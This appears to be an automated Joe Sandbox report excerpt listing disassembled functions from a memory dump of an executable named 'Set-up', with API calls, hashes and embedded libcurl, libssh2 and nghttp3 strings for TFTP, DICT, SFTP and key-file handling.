                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
                          • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                          • API String ID: 3302935713-3407012168
                          • Opcode ID: 0f9960e56f8063d7939c4ec1ef619540c5a6e52dbf101dd02b00ab623c32a783
                          • Instruction ID: 0aa861102ea475fd90cdd8c6181dfc8ad4122f45edf5f5bc3e055fff527e8790
                          • Opcode Fuzzy Hash: 0f9960e56f8063d7939c4ec1ef619540c5a6e52dbf101dd02b00ab623c32a783
                          • Instruction Fuzzy Hash: B1E104B5A04301AFD7109B24DC41B6BB7E4FFA5714F08852AFC5A9B382E774E901C7A2
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 00B0A29A
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 00B0A2C5
                          • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 00B0A2E3
                            • Part of subcall function 00B0A5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 00B0A5FC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy$memmove
                          • String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
                          • API String ID: 1283327689-1606465060
                          • Opcode ID: ccb547f6d95a0cefd8ec5cd372c0f4223ca1f53a021f54d37e123ecfcb861191
                          • Instruction ID: 4864d1be99d86e75a2faa5cf83fd8f645a668c5032a996678e742b130f80200e
                          • Opcode Fuzzy Hash: ccb547f6d95a0cefd8ec5cd372c0f4223ca1f53a021f54d37e123ecfcb861191
                          • Instruction Fuzzy Hash: 22C1D2316043059FD718DF18C8869AEBBE5FF98300F548969E9499B2C6E770ED84CF92
                          APIs
                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00FE32B5), ref: 00B54094
                          • feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B540A3
                          • rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B540B0
                          • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,00000000), ref: 00B540D6
                          • feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B540F4
                          • rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B54101
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B5410F
                          • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000), ref: 00B5413F
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B5414C
                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00B54165
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B54186
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B541A0
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000020,00000000), ref: 00B541BA
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,00000020,00000000), ref: 00B541E4
                          Strings
                          • Invalid key data, not base64 encoded, xrefs: 00B54214
                          • Invalid data in public key file, xrefs: 00B54117
                          • Unable to allocate memory for public key data, xrefs: 00B5418E
                          • Unable to read public key from file, xrefs: 00B541A8
                          • Unable to open public key file, xrefs: 00B540BA
                          • Missing public key data, xrefs: 00B5417E
                          • Invalid public key data, xrefs: 00B5422E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: fclose$feoffreadmemchrrewind$fopenisspace
                          • String ID: Invalid data in public key file$Invalid key data, not base64 encoded$Invalid public key data$Missing public key data$Unable to allocate memory for public key data$Unable to open public key file$Unable to read public key from file
                          • API String ID: 752180523-3150497671
                          • Opcode ID: 382910ca205abd953af05d1dc236ce5ea7b16318cc09f100f489bd4db20caae7
                          • Instruction ID: 9d8d0034a37310e8a2359522798120d34593df8df6e05c14d965442d8418e2d9
                          • Opcode Fuzzy Hash: 382910ca205abd953af05d1dc236ce5ea7b16318cc09f100f489bd4db20caae7
                          • Instruction Fuzzy Hash: 9351EBB1A043446FD6106A36AC4AF2B39DCDF5235AF1444B8FC4EE2282FA31D9989573
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AD2AD7
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AD2B3D
                          • sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00AD2D30
                          • WSAGetLastError.WS2_32 ref: 00AD2D3A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$ErrorLastsendto
                          • String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
                          • API String ID: 3285375004-3063461439
                          • Opcode ID: 1d3c837462cfe67f96136846bd0ee8c333168946ca4033c7802b64c5c7355ad2
                          • Instruction ID: e366b661caf1cadca6700c06f2f8ba8265e9cc88b191c857581ef728a3067759
                          • Opcode Fuzzy Hash: 1d3c837462cfe67f96136846bd0ee8c333168946ca4033c7802b64c5c7355ad2
                          • Instruction Fuzzy Hash: 99E11771B00301AFD7149B24CD86F6A77A4EF66704F04456AF84AAB392EB72EC14D7D2
                          APIs
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00A84749
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 00A848E5
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 00A8491B
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84963
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00A84971
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A8497B
                            • Part of subcall function 00A806F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00A85663,?), ref: 00A806F9
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84A41
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00A84A63
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84A6D
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00A84AE0
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84AEA
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00A84B28
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84B34
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00A84B76
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84B80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _errno$strtoul$strchr$memchrstrlen
                          • String ID: %ld$%u.%u.%u.%u$urlapi.c
                          • API String ID: 102816355-2423153182
                          • Opcode ID: 128f15af3b82bf10758e9cb4aee101f8f52f7ac66efa720834849fb8372548ea
                          • Instruction ID: c3ff015982bc1f3dfc5e638c9749d892472a3ac49ef4473cd0d338045b79d282
                          • Opcode Fuzzy Hash: 128f15af3b82bf10758e9cb4aee101f8f52f7ac66efa720834849fb8372548ea
                          • Instruction Fuzzy Hash: 05D116B19082026FE7247B20DC46B7E7BE49F5A354F094438F8899B282F779DD54C7A2
                          APIs
                            • Part of subcall function 00AA86F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000003), ref: 00AA8704
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00AA6460
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00AA6472
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00AA6487
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 00AA649C
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00AA6654
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00AA6666
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00AA667B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strchr$strlen
                          • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 8.10.1%sQUIT$CLIENT libcurl 8.10.1DEFINE %s %sQUIT$CLIENT libcurl 8.10.1MATCH %s %s %sQUIT$Failed sending DICT request$default$dict.c$lookup word is missing
                          • API String ID: 842768466-2079990832
                          • Opcode ID: bf88f313a2ecbfc70b262999e6a4dd3d1491fcfd155ba70d363a28b731dda947
                          • Instruction ID: e8bdbca2c3f2eafc7132e7f41f18d501ab32675fb05f187d56388d208d23d67f
                          • Opcode Fuzzy Hash: bf88f313a2ecbfc70b262999e6a4dd3d1491fcfd155ba70d363a28b731dda947
                          • Instruction Fuzzy Hash: 92A139A1E043816AE72227349E02B363B984F67B48F0D4078FD499B1D3FBA5DD50DA62
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00B4C719
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B4C7C9
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B4CB6F
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00FE2438,sftp.c,000006F4), ref: 00B4CD6E
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left,sftp.c,000005EE), ref: 00B4CD83
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->eof,sftp.c,000005EF), ref: 00B4CD98
                          Strings
                          • Response too small, xrefs: 00B4CC86
                          • gesftp_read() internal error, xrefs: 00B4CA72
                          • rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left, xrefs: 00B4CD7E
                          • FXP_READ response too big, xrefs: 00B4CCCE
                          • Read Packet At Unexpected Offset, xrefs: 00B4CCBD
                          • SFTP Protocol badness, xrefs: 00B4CCC7
                          • rc != LIBSSH2_ERROR_EAGAIN || !filep->eof, xrefs: 00B4CD93
                          • malloc fail for FXP_WRITE, xrefs: 00B4CCDB
                          • sftp.c, xrefs: 00B4CD64, 00B4CD79, 00B4CD8E
                          • SFTP Protocol badness: unrecognised read request response, xrefs: 00B4CCB3
                          • SFTP READ error, xrefs: 00B4CCFF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert$memcpy$_time64
                          • String ID: FXP_READ response too big$Read Packet At Unexpected Offset$Response too small$SFTP Protocol badness$SFTP Protocol badness: unrecognised read request response$SFTP READ error$gesftp_read() internal error$malloc fail for FXP_WRITE$rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left$rc != LIBSSH2_ERROR_EAGAIN || !filep->eof$sftp.c
                          • API String ID: 2498518694-199359813
                          • Opcode ID: c111ba54cc800f7f99bb18f2c917bba39ddef40cb1261faee3ebcab42a5e8e47
                          • Instruction ID: 7ddf98f913347eaf4c0b5950a983fb54e4a347dfe1cf74c3754894ae4023bb25
                          • Opcode Fuzzy Hash: c111ba54cc800f7f99bb18f2c917bba39ddef40cb1261faee3ebcab42a5e8e47
                          • Instruction Fuzzy Hash: 9602C2719053049FC760DF24DC85BAABBE4FF88714F1449A9F88A97252E730EE14DB92
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A9090A
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00A90979
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlenstrtoul
                          • String ID: Attempt to get SFTP stats failed: %s$Syntax error: chgrp gid not a number$Syntax error: chmod permissions not a number$Syntax error: chown uid not a number$atime$chgrp$chmod$chown$date overflow$incorrect date format for %.*s$mtime$vssh/libssh2.c
                          • API String ID: 4005410869-1121828786
                          • Opcode ID: 37da1ee323cf67883fe21bab556a3f8cbf8f51b8b395dcd99cd4f93bc1cb0715
                          • Instruction ID: 8683c7257b8838d0a461a87c417ec5d4e42eeee7d71318b484a2b6327979aa8b
                          • Opcode Fuzzy Hash: 37da1ee323cf67883fe21bab556a3f8cbf8f51b8b395dcd99cd4f93bc1cb0715
                          • Instruction Fuzzy Hash: 1EB137B0B14300AFD711EF24DC46F1AB7E5AF49718F048568F9485B3D2E372EA159B82
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 00ADC37A
                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 00ADC476
                          • WSAGetLastError.WS2_32 ref: 00ADC4AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLastmemcpystrcpy
                          • String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
                          • API String ID: 31095072-3036451936
                          • Opcode ID: a8c5725902a1cafdd6570f64aa1b5da73738b16d76b84763a86f0d4073944c32
                          • Instruction ID: b34ee430b334475e09b57713dce5dd8cb1b394230216fe499507c9b15df0fe41
                          • Opcode Fuzzy Hash: a8c5725902a1cafdd6570f64aa1b5da73738b16d76b84763a86f0d4073944c32
                          • Instruction Fuzzy Hash: E45159B2D083415FD710AB90EC01BAFB7A09F86324F44843AF9899B342D675E984DB93
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00AAA33C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
